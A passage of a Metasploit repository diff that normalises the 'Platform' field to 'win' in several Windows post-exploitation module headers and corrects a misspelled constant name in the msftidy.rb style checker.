'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
],
'Platform' => [ 'windows'],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))

2
modules/post/windows/manage/driver_loader.rb
View File

@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
'Platform' => 'windows',
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))

2
modules/post/windows/manage/ie_proxypac.rb
View File

@ -27,7 +27,7 @@ class Metasploit3 < Msf::Post
[ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],
[ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]
],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))

2
modules/post/windows/manage/portproxy.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))

2
modules/post/windows/manage/pptp_tunnel.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
[
[ 'URL', 'http://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
],
'Platform' => 'windows',
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))

2
modules/post/windows/manage/rpcapd_start.rb
View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
PORT will be used depending of the mode configured.},
'License' => MSF_LICENSE,
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))

4
tools/msftidy.rb
View File

@ -11,7 +11,7 @@ require 'find'
require 'time'
CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES']
SUPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES']
SUPPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES']
if CHECK_OLD_RUBIES
require 'rvm'
@ -92,7 +92,7 @@ class Msftidy
# Display an info message. Info messages do not alter the exit status.
#
def info(txt, line=0)
return if SUPRESS_INFO_MESSAGES
return if SUPPRESS_INFO_MESSAGES
line_msg = (line>0) ? ":#{line}" : ''
puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}"
end